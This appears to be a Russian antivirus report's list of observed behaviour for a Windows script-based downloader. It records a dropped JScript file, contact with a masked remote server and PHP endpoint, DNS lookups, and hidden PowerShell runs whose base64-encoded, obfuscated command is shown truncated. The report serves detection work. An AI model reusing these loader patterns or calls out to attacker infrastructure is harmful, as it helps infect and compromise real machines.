Техническая информация
- '<SYSTEM32>\wscript.exe' "%WINDIR%\Temp\whivripfqw.js"
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1920
- %WINDIR%\temp\whivripfqw.js
- %TEMP%\835338.cvr
- 'sp###rerck.com':80
- http://sp###rerck.com/qoie8rg/m1m2m.php?l=########
- DNS ASK sp###rerck.com
- DNS ASK al####usenberg.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -En IAAoACAALgAoACcAbgBFAHcAJwArACcALQBPAEIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIAAgAFMAWQBTAFQAYABlAG0AYAAuAGkAbwBgAC4AQwBPAE0AUABSAGAARQBgAHMAUwBpAE8AYABOAC4AZABlAGYAbABBAFQAZQBgAFMAVABSAEUAQQBtA...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -En IAAoACAALgAoACcAbgBFAHcAJwArACcALQBPAEIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIAAgAFMAWQBTAFQAYABlAG0AYAAuAGkAbwBgAC4AQwBPAE0AUABSAGAARQBgAHMAUwBpAE8AYABOAC4AZABlAGYAbABBAFQAZQBgAFMAVABSAEUAQQBtA...